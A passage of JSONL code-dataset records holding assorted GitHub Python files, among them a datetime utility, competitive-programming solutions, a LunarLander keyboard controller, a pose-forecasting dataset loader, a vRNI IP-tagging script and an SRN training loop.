time_ else \"\")\n elif intelligent and now() >= current_time and now.date.year > current_time.date().year:\n if CustomDateTime.DEFAULT_LANG == \"fr\":\n return \"Il y a longtemps\" if now() >= current_time else \"Dans un futur lointain\"\n return \"A long time ago\" if now() >= current_time else \"In a long time\"\n\n if isinstance(d_format, str):\n if \"%\" in d_format:\n try:\n res = current_time.strftime(d_format)\n assert res != d_format\n return res\n except (ValueError, AssertionError):\n pass\n d_format, time_ = CustomDateTime._parse_format(d_format, current_time)\n if \"-\" in d_format:\n sep = \"-\"\n elif \"/\" in d_format:\n sep = \"/\"\n else:\n d_format = \"%Y{sep}%m{sep}%d\"\n if sep is None:\n sep = \"-\"\n\n if str(d_format).lower() == \"normal\":\n date_time = CustomDateTime.WEEKDAYS[current_time.weekday()] + \" \" + \\\n f\"{current_time.day:0>2} \" + \\\n CustomDateTime.MONTH[current_time.month][\"value\"][0] + \" \" + \\\n str(current_time.year)\n\n else:\n d_format = CustomDateTime.SUPPORTED_FORMAT.get(\n d_format, d_format).format(sep=sep)\n date_time = current_time.strftime(d_format + (f\" %H:%M:%S\" if time_ else \"\"))\n\n if not microsecond:\n current_time.replace(microsecond=0)\n ms = current_time.microsecond\n return date_time + (f\":{str(ms)[:3]:0>3}\" if microsecond and time_ else \"\")\n\n # Ok\n @classmethod\n def from_calculation(cls,\n date_time: str | datetime.datetime | datetime.date | CustomDateTime = \"now\",\n minus_or_add: str | int | float = None, **kwargs):\n \"\"\"\n use to generate new date from the passing arg date_time by applying some added day, month, year,\n second, minutes, weeks\n Args:\n date_time: (str, datetime.datetime | datetime.date | CustomDateTime), the init date\n minus_or_add: (str, int, float):\n when : str\n it's needed to specify what we want to add. Example\n >> minus_or_add = \"1 day -1month 3 years\"; date_time=\"2023-01-01\"\n (Result) 2025-12-02 00:00:00\n when : int\n this is equivalent to f'{minus_or_add} days'\n when : float\n Equivalent to f'{minus_or_add} seconds'\n \"\"\"\n\n date_time = cls._parse(date_time, **kwargs)\n if isinstance(minus_or_add, int):\n minus_or_add = str(minus_or_add) + \" day\"\n elif isinstance(minus_or_add, float):\n sign = 1 if minus_or_add >= 0 else -1\n sec, micro = str(abs(minus_or_add)).split(\".\")\n micro = int(micro) * 1000\n minus_or_add = f\"{sign * sec}secs {sign * micro}microseconds\"\n\n if isinstance(minus_or_add, str):\n values = re.findall(\n r\"([-+])?\\s*(\\d+)\\s*(days?|months?|years?|\"\n r\"weeks?|hours?|mins?|minutes?|secs?|seconds?|\"\n r\"microsecs?|microseconds?)\",\n minus_or_add)\n assert len(values), f\"Bad value given: '{minus_or_add}'\"\n keys = [\n \"weeks\",\n \"days\",\n \"hours\",\n \"minutes\",\n \"seconds\",\n \"microseconds\",\n \"years\",\n \"months\",\n ]\n args = {key: 0 for key in keys}\n match = {k[:-1]: k for k in keys}\n match.update({\"min\": \"minutes\", \"sec\": \"seconds\", \"microsec\": \"microseconds\"})\n for arg in values:\n op, value, item = arg\n if op is None:\n op = \"\"\n if item.endswith(\"s\"):\n item = item[:-1]\n item = match[item]\n args[item] = int(op + value)\n years = args.pop(\"years\")\n months = args.pop(\"months\")\n\n delta = datetime.timedelta(**args)\n\n date_time = date_time + delta\n\n try:\n while True:\n if date_time.month + months > 12 or date_time.month + months <= 0:\n years += 1 if months > 0 else -1\n months += -12 if months > 0 else 12\n else:\n break\n date_time = date_time.replace(month=date_time.month + months, year=date_time.year + years)\n except ValueError:\n # assert date_time.month + months == 2, \"An unknown error occurred\"\n date_time = date_time.replace(\n month=date_time.month + months + 1,\n year=date_time.year + years,\n day=1) + datetime.timedelta(days=-1)\n\n return cls(date_time)\n\n\nif __name__ == '__main__':\n print(CustomDateTime.datetime_as_string(\"now\", d_format=\"y--md\"))\n print(CustomDateTime(\"202301-01 2:10:10\", d_format=\"%Y%m-%d\"))\n","repo_name":"boris-kanga/kb_package","sub_path":"kb_package/utils/custom_datetime.py","file_name":"custom_datetime.py","file_ext":"py","file_size_in_byte":30495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"32495156432","text":"n_len = int(input())\r\nn = [int(n_temp) for n_temp in input().strip().split(' ')]\r\nm_len = int(input())\r\nm = [int(m_temp) for m_temp in input().strip().split(' ')]\r\ncounts = [0] * 201\r\npivot = n[0]\r\nfor i in range(n_len):\r\n counts[100+n[i]-pivot] += 1\r\nfor i in range(m_len):\r\n counts[100+m[i]-pivot] -= 1\r\n#print (counts) \r\nfor i in range(len(counts)):\r\n if counts[i] != 0:\r\n print (i-100+pivot, end=' ')","repo_name":"gauthamkrishna-g/HackerRank","sub_path":"Algorithms/Search/Missing_Numbers.py","file_name":"Missing_Numbers.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"899922899","text":"# python-sudo.sh\n\nimport sys, gym, time\nfrom pynput.keyboard import Listener\nimport keyboard\n\n#\n# Action space Size:2 | (Main Engine, Side Engines):= ( [-1, 1], [-1, 1])\n#\n\nenv = gym.make('LunarLanderContinuous-v2' if len(sys.argv) < 2 else sys.argv[1])\n\nACTIONS = env.action_space.shape\nSKIP_CONTROL = 0 # Use previous control decision SKIP_CONTROL times, that's how you\n# can test what skip is still usable.\n\nhuman_agent_action = 0\nsac_agent_action = 0\nhuman_wants_restart = False\nhuman_sets_pause = False\n\nstate_dim = env.observation_space.shape[0]\naction_dim = env.action_space.shape[0]\naction_bound = env.action_space.high\nprint(\"State dim: \" + str(state_dim))\nprint(\"Action Dim: \" + str(action_dim))\nprint(\"Reward Threshold: \" + str(env.spec.reward_threshold))\nprint(\"Action Bound: \" + str(action_bound))\n\na = 0\n\n\ndef key_press(key, mod):\n global human_agent_action, human_wants_restart, human_sets_pause, sac_agent_action\n if key == 0xff0d: human_wants_restart = True\n if key == 32: human_sets_pause = not human_sets_pause\n # a = int(key - ord('0'))\n # if a <= 0 or a > 4: return\n if key not in [ord(\"w\"), ord(\"s\"), ord(\"a\"), ord(\"d\")]: return\n if key == ord(\"w\"):\n # print(\"pressed w\")\n human_agent_action = 1\n if key == ord(\"s\"):\n # print(\"pressed s\")\n human_agent_action = -1\n if key == ord(\"a\"):\n # print(\"pressed a\")\n sac_agent_action = -1\n if key == ord(\"d\"):\n # print(\"pressed d\")\n sac_agent_action = 1\n\n\ndef key_release(key, mod):\n global human_agent_action, sac_agent_action\n if key not in [ord(\"w\"), ord(\"s\"), ord(\"a\"), ord(\"d\")]: return\n\n if key == ord(\"w\"):\n # print(\"released w\")\n human_agent_action = 0\n if key == ord(\"s\"):\n # print(\"released s\")\n human_agent_action = 0\n if key == ord(\"a\"):\n # print(\"released a\")\n sac_agent_action = 0\n if key == ord(\"d\"):\n # print(\"released d\")\n sac_agent_action = 0\n\n\nenv.render()\nenv.unwrapped.viewer.window.on_key_press = key_press\nenv.unwrapped.viewer.window.on_key_release = key_release\n\n\ndef rollout(env):\n global human_agent_action, human_wants_restart, human_sets_pause\n human_wants_restart = False\n obser = env.reset()\n skip = 0\n total_reward = 0\n total_timesteps = 0\n a_x, a_y = [0, 0]\n while 1:\n if not skip:\n a_x, a_y = [human_agent_action, sac_agent_action]\n total_timesteps += 1\n skip = SKIP_CONTROL\n else:\n skip -= 1\n\n obser, r, done, info = env.step([a_x, a_y])\n # if r != 0:\n # print(\"reward %0.3f\" % r)\n total_reward += r\n window_still_open = env.render()\n if window_still_open == False: return False\n if done: break\n if human_wants_restart: break\n while human_sets_pause:\n env.render()\n time.sleep(0.1)\n time.sleep(0.1)\n print(\"timesteps %i reward %0.2f\" % (total_timesteps, total_reward))\n\n\nprint(\"ACTIONS={}\".format(ACTIONS))\nprint(\"Press keys 1 2 3 ... to take actions 1 2 3 ...\")\nprint(\"No keys pressed is taking action 0\")\n\nwhile 1:\n window_still_open = rollout(env)\n if window_still_open == False: break\n","repo_name":"ligerfotis/HumanAgentLunar","sub_path":"keyboard_env_continuous.py","file_name":"keyboard_env_continuous.py","file_ext":"py","file_size_in_byte":3230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71723114496","text":"import copy\nimport json\nimport math\nimport numpy as np\nimport random\nimport torch\nfrom torch.nn.utils.rnn import pad_sequence\n\nfrom utils.utils import path_to_data\nfrom utils.data import load_data_3dpw_multiperson, load_data_somof\nfrom torchvision import transforms\n\ndef collate_batch(batch):\n joints_list = []\n masks_list = []\n num_people_list = []\n for joints, masks in batch:\n # Make sure first dimension is # people for single person case\n if len(joints.shape) == 3:\n joints = joints.unsqueeze(0)\n masks = masks.unsqueeze(0)\n\n joints_list.append(joints)\n masks_list.append(masks)\n num_people_list.append(torch.zeros(joints.shape[0]))\n\n joints = pad_sequence(joints_list, batch_first=True)\n masks = pad_sequence(masks_list, batch_first=True)\n padding_mask = pad_sequence(num_people_list, batch_first=True, padding_value=1).bool()\n\n return joints, masks, padding_mask\n\n\ndef batch_process_joints(joints, masks, padding_mask, config,training=False, multiperson=True):\n joints = joints.to(config[\"DEVICE\"])\n masks = masks.to(config[\"DEVICE\"])\n \n if multiperson and len(joints.shape) == 4:\n joints = joints.unsqueeze(1)\n masks = masks.unsqueeze(1)\n\n in_F = config[\"TRAIN\"][\"input_track_size\"]\n\n if multiperson:\n if config[\"DATA\"][\"joints\"] == \"somof\" or config['DATA']['joints'] == 'posetrack':\n in_joints_pelvis = joints[:,:, (in_F-1):in_F, 6:7, :].clone()\n elif config[\"DATA\"][\"joints\"] == \"cmu\":\n in_joints_pelvis = joints[:,:, (in_F-1):in_F , 12:13 ,:].clone()\n else:\n if config[\"DATA\"][\"joints\"] == \"somof\" or config['DATA']['joints'] == 'posetrack':\n in_joints_pelvis = joints[:, (in_F-1):in_F , 6:7 ,:].clone()\n else:\n in_joints_pelvis = torch.zeros_like(in_joints_pelvis)\n \n joints -= in_joints_pelvis\n\n if multiperson:\n B, N, F, J, K = joints.shape\n joints = joints.transpose(1, 2).reshape(B, F, N*J, K)\n in_joints_pelvis = in_joints_pelvis.reshape(B, 1, N, K)\n masks = masks.transpose(1, 2).reshape(B, F, N*J)\n\n # If training, can do augmentations\n if training:\n if config[\"DATA\"][\"aug_rotate\"]:\n joints = getRandomRotatePoseTransform(config)(joints)\n if config[\"DATA\"][\"aug_scale\"]:\n joints = getRandomScaleTransform()(joints)\n if \"aug_permute\" in config[\"DATA\"] and config[\"DATA\"][\"aug_permute\"]:\n joints, masks, padding_mask = getRandomPermuteOrder(joints, masks, padding_mask)\n \n\n in_F, out_F = config[\"TRAIN\"][\"input_track_size\"], config[\"TRAIN\"][\"output_track_size\"] \n in_joints = joints[:,:in_F].float()\n out_joints = joints[:,in_F:in_F+out_F].float()\n in_masks = masks[:,:in_F].float()\n out_masks = masks[:,in_F:in_F+out_F].float()\n\n return in_joints, in_masks, out_joints, out_masks, in_joints_pelvis.float(), padding_mask.float()\n\n\n\n\ndef getRandomScaleTransform(r1=0.8, r2=1.2):\n def do_scale(x):\n #scale = (r1 - r2) * torch.rand(1) + r2\n scale = (r1 - r2) * torch.rand(x.shape[0]).reshape(-1, 1, 1, 1) + r2\n return x * scale.to(x.device)\n return transforms.Lambda(lambda x: do_scale(x))\n\n\ndef getRandomPermuteOrder(joints, masks, padding_mask):\n \"\"\"\n Randomly permutes persons across the input token dimension. This helps\n expose all learned embeddings to a variety of poses.\n \"\"\"\n \n def do_permute(joints, masks, padding_mask):\n B, N = padding_mask.shape\n B, F, NJ, K = joints.shape\n J = NJ // N\n \n perm = torch.argsort(torch.rand(B, N), dim=-1).reshape(B, N)\n idx = torch.arange(B).unsqueeze(-1)\n \n joints = joints.view(B, F, N, J, K).transpose(1, 2)[idx, perm]\n joints = joints.transpose(1, 2).reshape(B, F, N*J, K)\n \n masks = masks.view(B, F, N, J).transpose(1, 2)[idx,perm]\n masks = masks.transpose(1, 2).reshape(B, F, N*J)\n \n padding_mask = padding_mask[idx, perm]\n \n return joints, masks, padding_mask\n\n return do_permute(joints, masks, padding_mask)\n\n\ndef getRandomRotatePoseTransform(config):\n \"\"\"\n Performs a random rotation about the origin (0, 0, 0)\n \"\"\"\n\n def do_rotate(pose_seq):\n \"\"\"\n pose_seq: torch.Tensor of size (B, S, J, 3) where S is sequence length, J is number \n of joints, and the last dimension is the coordinate\n \"\"\"\n B, F, J, K = pose_seq.shape\n\n angles = torch.deg2rad(torch.rand(B)*360)\n\n rotation_matrix = torch.zeros(B, 3, 3).to(pose_seq.device)\n rotation_matrix[:,1,1] = 1\n rotation_matrix[:,0,0] = torch.cos(angles)\n rotation_matrix[:,0,2] = torch.sin(angles)\n rotation_matrix[:,2,0] = -torch.sin(angles)\n rotation_matrix[:,2,2] = torch.cos(angles)\n\n rot_pose = torch.bmm(pose_seq.reshape(B, -1, 3).float(), rotation_matrix)\n rot_pose = rot_pose.reshape(pose_seq.shape)\n return rot_pose\n\n return transforms.Lambda(lambda x: do_rotate(x))\n\n\nclass MultiPersonPoseDataset(torch.utils.data.Dataset):\n SOMOF_JOINTS = [1, 2, 4, 5, 7, 8, 12, 16, 17, 18, 19, 20, 21]\n COCO_TO_SOMOF = [6, 12, 7, 13, 8, 14, 0, 3, 9, 4, 10, 5, 11]\n\n\n def __init__(self, name, split=\"train\", track_size=30, track_cutoff=16, segmented=True,\n add_flips=False, frequency=1):\n \"\"\"\n name: The name of the dataset (e.g. \"somof\")\n split: one of ['train', 'valid', 'test']\n add_flips: whether to add flipped sequences to data as well (data augmentation)\n mode: one of ['inference', 'eval'] In eval mode, will not do train data augmentation.\n frequency: How often to take a frame (i.e. distance between frames). For example, if\n frequency=2, will take every other frame.\n \"\"\"\n self.name = name\n self.split = split\n self.track_size = track_size\n self.track_cutoff = track_cutoff\n self.segmented = segmented\n self.frequency = frequency\n self.add_flips = add_flips\n\n self.initialize()\n \n def load_data(self):\n raise NotImplementedError(\"Dataset load_data() method is not implemented.\")\n\n def initialize(self):\n self.load_data()\n\n if self.segmented:\n tracks = []\n for scene in self.datalist:\n for seg, j in enumerate(range(0, len(scene[0][0]) - self.track_size * self.frequency + 1, self.track_size)):\n people = []\n for person in scene:\n start_idx = j\n end_idx = start_idx + self.track_size * self.frequency\n J_3D_real, J_3D_mask = person[0][start_idx:end_idx:self.frequency], person[1][\n start_idx:end_idx:self.frequency]\n people.append((J_3D_real, J_3D_mask))\n tracks.append(people)\n self.datalist = tracks\n\n # If we're on a train split, do some additional data augmentation as well\n if self.add_flips:\n print(\"doing some flips for \" + self.name + \", \" + self.split + \" split\")\n # for each sequence, we can also add a \"flipped\" sequence\n flipped_datalist = []\n for seq in self.datalist:\n flipped_seq = []\n for J_3D_real, J_3D_mask in seq:\n J_3D_flipped = torch.flip(J_3D_real, dims=(0,)).clone()\n J_3D_mask_flipped = torch.flip(J_3D_mask, dims=(0,)).clone()\n flipped_seq.append((J_3D_flipped, J_3D_mask_flipped))\n flipped_datalist.append(flipped_seq)\n \n self.datalist += flipped_datalist\n\n if not self.segmented:\n # create a mapping from idx to which track/frame to look at\n # prevents extra computation at dataset time\n frame_count = 0\n self.track_map = []\n for i, scene in enumerate(self.datalist):\n track_frames = len(scene[0][0]) - self.track_size * self.frequency + 1\n for k in range(0, track_frames):\n self.track_map.append((i, k))\n frame_count += track_frames\n\n def __len__(self):\n if self.segmented:\n return len(self.datalist)\n else:\n return sum([len(scene[0][0]) - self.track_size * self.frequency + 1 for scene in self.datalist])\n\n def __getitem__(self, idx):\n if self.segmented:\n scene = self.datalist[idx]\n\n else:\n # We want to count the idx-th valid frame in our list of tracks\n # A valid frame is any frame that has at least (track_size-1)\n # frames ahead of it (i.e. it can be used as the start frame)\n track_idx, frame_idx = self.track_map[idx]\n\n scene = []\n for person in self.datalist[track_idx]:\n J_3D_real = person[0][\n frame_idx:frame_idx + self.track_size * self.frequency:self.frequency]\n J_3D_mask = person[1][\n frame_idx:frame_idx + self.track_size * self.frequency:self.frequency]\n scene.append((J_3D_real, J_3D_mask))\n\n J_3D_real = torch.stack([s[0] for s in scene])\n J_3D_mask = torch.stack([s[1] for s in scene])\n\n return J_3D_real, J_3D_mask\n\n\nclass SoMoFDataset(MultiPersonPoseDataset):\n SOMOF_JOINTS = [1, 2, 4, 5, 7, 8, 12, 16, 17, 18, 19, 20, 21]\n COCO_TO_SOMOF = [6, 12, 7, 13, 8, 14, 0, 3, 9, 4, 10, 5, 11]\n\n def __init__(self, **args):\n super(SoMoFDataset, self).__init__(\"somof\", frequency=1, **args)\n\n def load_data(self):\n data_in, data_out, _, _ = load_data_somof(split=self.split)\n\n data = np.concatenate((data_in, data_out), axis=2)\n data = torch.from_numpy(data)\n data = data.reshape((*data.shape[:-1], 13, 3)) # (N, 30, 2, 13, 3)\n\n self.num_kps = 13\n self.datalist = [[(person, torch.ones(person.shape[:-1])) for person in track] for track in data]\n\nclass ThreeDPWDataset(MultiPersonPoseDataset):\n def __init__(self, **args):\n super(ThreeDPWDataset, self).__init__(\"3dpw\", frequency=2, **args)\n\n def load_data(self):\n self.data = load_data_3dpw_multiperson(split=self.split)\n\n self.datalist = []\n for scene in self.data:\n people = [(torch.from_numpy(joints)[:,self.SOMOF_JOINTS],\n torch.from_numpy(mask)[:,self.SOMOF_JOINTS]) for joints, mask in scene]\n self.datalist.append(people)\n\n\ndef create_dataset(dataset_name, logger, **args):\n logger.info(\"Loading dataset \" + dataset_name)\n \n if dataset_name == \"3dpw\":\n dataset = ThreeDPWDataset(**args)\n elif dataset_name == \"somof\":\n dataset = SoMoFDataset(**args)\n else:\n raise ValueError(f\"Dataset with name '{dataset_name}' not found.\")\n \n logger.info(f\"Loaded {len(dataset)} annotations for \" + dataset_name)\n return dataset\n\n\ndef get_datasets(datasets_list, config, logger):\n \"\"\" \n Returns a list of torch dataset objects\n datasets_list: [String]\n \"\"\"\n in_F, out_F = config['TRAIN']['input_track_size'], config['TRAIN']['output_track_size']\n datasets = []\n for dataset_name in datasets_list:\n datasets.append(create_dataset(dataset_name, logger, split=\"train\", track_size=(in_F+out_F), track_cutoff=in_F, segmented=config['DATA']['segmented'], add_flips=config['DATA']['add_flips']))\n return datasets","repo_name":"evendrow/somoformer","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":11674,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"79"} +{"seq_id":"1126394004","text":"\"\"\"\nTime complexity: O(v + e) vertices + edges. In DFS look all vertces and edges.\nSpace complexity: O(v)\n\"\"\"\n\n\ndef is_node_in_cycle(node: 'int', edges: 'list[list[int]]', visited: 'list[bool]', in_stack: 'list[bool]'):\n visited[node] = True\n in_stack[node] = True\n\n neighbours = edges[node]\n for neighbour in neighbours:\n if not visited[neighbour]:\n contains_cycle = is_node_in_cycle(neighbour, edges, visited, in_stack)\n if contains_cycle:\n return True\n elif in_stack[neighbour]:\n return True\n in_stack[node] = False\n return False\n\n\ndef cycle_in_graph(edges: 'list[list[int]]'):\n number_of_nodes = len(edges)\n visited = [False for _ in range(number_of_nodes)]\n in_stack = [False for _ in range(number_of_nodes)]\n\n for node in range(number_of_nodes):\n if visited[node]:\n continue\n contains_cycle = is_node_in_cycle(node, edges, visited, in_stack)\n if contains_cycle:\n return True\n \n return False\n\n\ndef main() -> None:\n edges = [\n [1, 3],\n [2, 3, 4],\n [0],\n [],\n [2, 5],\n []\n ]\n\n ans = cycle_in_graph(edges)\n print(f'The answer is: {ans}')\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"mynameischokan/coding-problems","sub_path":"Graphs/cycle_in_graph.py","file_name":"cycle_in_graph.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"31766674843","text":"import csv\nimport ipaddress\nimport json\nimport init_api_client\nimport argparse\nimport swagger_client\nimport utilities\nimport logging\nfrom swagger_client.rest import ApiException\n\nlogger = logging.getLogger(\"vrni_sdk\")\n\n\ndef main(args):\n settings_api = swagger_client.SettingsApi()\n\n if args.action == 'add':\n logger.info(\"Adding IP-Addresses to EAST_WEST/INTERNET Tag\")\n with open(\"{}\".format(args.ip_tags_csv), 'r') as csvFile:\n ip_tags = csv.DictReader(csvFile)\n for ip_tag in ip_tags:\n ip_addresses = ip_tag['IP_Addresses']\n tag_id = ip_tag['TAG_ID']\n body = get_body(ip_addresses, tag_id)\n try:\n logger.info(\"Adding {} to {} tag\".format(\n ip_addresses, tag_id))\n settings_api.add_ip_tag(tag_id, body)\n except ApiException as e:\n logger.exception(\n \"Failed adding {} to tag: {} : Error : {} \".format(ip_addresses, tag_id,\n json.loads(e.body)))\n if args.action == 'remove':\n logger.info(\"Removing IP-Addresses from EAST_WEST/INTERNET Tag\")\n with open(\"{}\".format(args.ip_tags_csv), 'r') as csvFile:\n ip_tags = csv.DictReader(csvFile)\n for ip_tag in ip_tags:\n ip_addresses = ip_tag['IP_Addresses']\n tag_id = ip_tag['TAG_ID']\n body = get_body(ip_addresses, tag_id)\n try:\n logger.info(\"removing {} from {} tag\".format(\n ip_addresses, tag_id))\n settings_api.remove_ip_tag(tag_id, body)\n except ApiException as e:\n logger.exception(\n \"Failed removing {} from tag: {} : Error : {} \".format(ip_addresses, tag_id,\n json.loads(e.body)))\n\n if args.action == 'get':\n logger.info(\"Getting IP-Addresses with EAST_WEST/INTERNET Tag\")\n with open(\"{}\".format(args.ip_tags_csv), 'w') as csvFile:\n fields = [\"IP_Addresses\", \"TAG_ID\"]\n writer = csv.DictWriter(csvFile, fieldnames=fields)\n writer.writeheader()\n ip_tag_ids = settings_api.get_ip_tag_ids()\n data = []\n for tag_id in ip_tag_ids.tag_ids:\n ip_tags = settings_api.get_ip_tag(tag_id)\n for ip_tag in ip_tags.ip_address_ranges:\n data_dict = {}\n data_dict['TAG_ID'] = ip_tags.tag_id\n if ip_tag.start_ip == ip_tag.end_ip:\n data_dict['IP_Addresses'] = ip_tag.start_ip\n data.append(data_dict)\n else:\n data_dict['IP_Addresses'] = \"{}-{}\".format(\n ip_tag.start_ip, ip_tag.end_ip)\n data.append(data_dict)\n data = data + [{\"IP_Addresses\": subnet, 'TAG_ID': ip_tags.tag_id}\n for subnet in ip_tags.subnets]\n writer.writerows(data)\n for value in data:\n logger.info(\"Got {} with {} Tag\".format(\n value['IP_Addresses'], value['TAG_ID']))\n\n\ndef get_body(ip_address, tag_id):\n body = {\"tag_id\": \"{}\".format(tag_id)}\n if \"-\" in ip_address:\n ips = ip_address.split(\"-\")\n start_ip = ips[0]\n end_ip = ips[1]\n body[\"ip_address_ranges\"] = [{\"start_ip\": \"{}\".format(start_ip),\n \"end_ip\": \"{}\".format(end_ip)}]\n elif \"/\" in ip_address:\n body[\"subnets\"] = [\"{}\".format(ip_address)]\n else:\n body[\"ip_address_ranges\"] = [{\"start_ip\": \"{}\".format(ip_address),\n \"end_ip\": \"{}\".format(ip_address)}]\n return body\n\n\ndef parse_arguments():\n parser = init_api_client.parse_arguments()\n parser.add_argument(\"--ip_tags_csv\", action=\"store\",\n default='ip_tags.csv', help=\"Name of csv file\")\n parser.add_argument(\"--action\", action=\"store\",\n default='get', help=\"Action can be 'add' 'get' or 'remove'\")\n\n args = parser.parse_args()\n return args\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n utilities.configure_logging(\"/tmp\")\n api_client = init_api_client.get_api_client(args)\n main(args)\n","repo_name":"vmware/network-insight-sdk-python","sub_path":"examples/ip_tagging.py","file_name":"ip_tagging.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"23368373789","text":"from bisect import bisect_left as bs\n\nif __name__ == '__main__':\n n, k = [int(__) for __ in input().strip().split()]\n s = input().strip()\n li = sorted(list(set(s)))\n if k > n:\n print(s + li[0] * (k - n))\n elif k == n:\n for i in range(n - 1, -1, -1):\n idx = bs(li, s[i])\n if idx != len(li) - 1:\n print(s[:i] + li[idx + 1] + li[0] * (n - i - 1))\n break\n else:\n print(s[:k - 1] + s[k])\n","repo_name":"bvsbrk/Algos","sub_path":"src/Codeforces/round_466/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28194610299","text":"import torch\r\nfrom torch.utils.data import Dataset\r\nfrom srns import *\r\nimport os\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport numpy as np\r\nfrom dataloader_srn import *\r\nfrom torch.utils.data import DataLoader\r\nimport utils\r\nfrom comon import *\r\nimport logging\r\n\r\nif __name__== '__main__':\r\n intrinsic_matrix = utils.parse_intrinsics(intrinsics_file_path) \r\n \r\n \r\n if validat1:\r\n val_dataset = class1(val_data_dir,num_instances,image_sidelength)\r\n\r\n\r\n val_dataloader =Dataloader(val_dataset,batch_size = batch_size,shuffle=false,drop_last= true)\r\n \r\n id1 = torch.LongTensor([[2]])\r\n id1 = id1.to(device)\r\n model = SRNS(input_size,output_size,hidden_state_size,pixel_output)\r\n if torch.cuda.is_available():\r\n model = model.cuda()\r\n #train_dataset = class1(data_dir,num_instances,image_sidelength)\r\n train_dataset = class1(\"C:/Users/DELL/Desktop/Current_fields/SRN/dataset/shepard_metzler_train/\",20,64)\r\n train_dataloader = DataLoader(train_dataset,batch_size = 4,shuffle=True,num_workers=0)\r\n\r\n\r\n \r\n model.train()\r\n model.cuda()\r\n #results_path = os.path.join(root_dir,\"results\")\r\n if not os.path.isdir(results_path):\r\n os.mkdir(results_path)\r\n #log_path = os.path.join(results_path,\"log_files\")\r\n #tensorboard_dir = os.path.join(results_path,'tensorboard_files')\r\n #checkpoints_dir = os.path.join(results_path,\"checkpoints\")\r\n if not os.path.isdir(log_path):\r\n os.mkdir(log_path)\r\n os.mkdir(tensorboard_dir)\r\n if not os.path.isdir(checkpoints_dir):\r\n os.mkdir(checkpoints_dir)\r\n if load_model is not False:\r\n print(\"Loading model from %s\"%save_path)\r\n model.load_state_dict(save_path)\r\n \r\n optimizer = torch.optim.Adam(model.parameters(),lr = lr)\r\n logger = logging.getLogger('LOG')\r\n logger.info(\"learning rate:{}\".format(lr))\r\n logger.info(\"start epoch:{}\".format(start_epoch))\r\n logger.info(\"end epoch:{}\".format(end_epoch))\r\n logger.info(\"Batch_size:{}\".format(train_batch_size))\r\n print(\"training started\")\r\n if torch.cuda.is_available():\r\n print(\"using cuda..........\")\r\n train_dataloader = DataLoader(train_dataset,batch_size=batch_size,shuffle=False)\r\n writer = SummaryWriter(log_dir = log_path)\r\n val_writer = SummaryWriter(log_dir = log_path)\r\n for epoch in range(0,n_epochs):\r\n iter = 0\r\n for inputs in train_dataloader:\r\n for objects in inputs:\r\n iter+=1\r\n if torch.cuda.is_available(): \r\n #print('using cuda........')\r\n #images,extrinsics,intrinsics = objects\r\n images = objects[0]\r\n extrinsics = objects[2]\r\n intrinsics =objects[1]\r\n #inputs = inputs.to(device)\r\n images = images.to(device)\r\n extrinsics = extrinsics.to(device)\r\n intrinsics = intrinsics.to(device)\r\n \r\n \r\n #labels = labels.to(device)\r\n translations = extrinsics[:,:,-1]\r\n pixels,depths =model(id1,images,extrinsics,intrinsics,translations)\r\n\r\n optimizer.zero_grad()\r\n\r\n #image_loss = model.image_loss_l2(inputs,outputs)\r\n #image_loss = model.image_loss_l2(inputs,id1)\r\n image_loss = model.image_loss_l2()\r\n latent_loss = model.latent_loss_embed(lamb1)\r\n depth_reg_loss = model.depth_reg_loss_l2(depths,lamb1)\r\n #weight2*latent_loss + weight3*depth_reg_loss\r\n total_loss = weight1*image_loss \r\n total_loss.backward(retain_graph=True)\r\n \r\n optimizer.step()\r\n print('____________________________________________________________________________________________________________________________________')\r\n print('iter:{}'.format(iter),\"||\",'epoch:{}'.format(epoch),\"||\",'lr:{:.6f}'.format(lr),\"||\",'recons_loss:{:.6f}'.format(image_loss),\"||\",'embed_loss:{}'.format(latent_loss),\"||\",'depth_reg_loss:{}'.format(depth_reg_loss))\r\n #print('iter:{}'.format(iter),'epoch:{}'.format(epoch),'lr:{:.6f}'.format(lr),'recons_loss:{:.6f}'.format(image_loss))\r\n writer.add_scalar('recon_loss',image_loss,epoch)\r\n writer.add_scalar('embed_loss',latent_loss,epoch)\r\n writer.add_scalar('depth_reg_loss',depth_reg_loss,epoch) \r\n if epoch%SAVE_MODEL_EPOCH==0:\r\n print(\"running val set...........\")\r\n\r\n model.eval()\r\n with torch.no_grad():\r\n dist_losses = [] \r\n for inputs in val_dataloader:\r\n if torch.cuda.is_available():\r\n inputs = inputs.to(device)\r\n #labels = labels.to(device)\r\n ouputs = model(inputs)\r\n dist_loss = model.image_loss_l2(inputs,outputs)\r\n dist_losses.append(dist_losses)\r\n\r\n \r\n model.train()\r\n print(\"validation_loss:{:.6f}\".format(np.mean(dist_loss)))\r\n val_writer.add_scalar('recon_loss',np.mean(dist_loss),epoch)\r\n torch.save(model.state_dict,os.path.join(checkpoints_dir,'epoch%d.pth'%epoch))\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"nishant34/SRNS","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41507388105","text":"argList = []\ngraph = {}\n\nclass Graph:\n numPaths = 0\n def __init__(self, graph):\n self.graph = graph\n\n def dfs(self, current, visited, path):\n path.append(current)\n if visited is None:\n visited = set()\n visited.add(current)\n\n if current == 'end':\n print(path)\n self.numPaths += 1\n else: \n for cave in self.graph[current]:\n if cave.islower() and cave in visited:\n pass\n else:\n self.dfs(cave, visited, path)\n\n 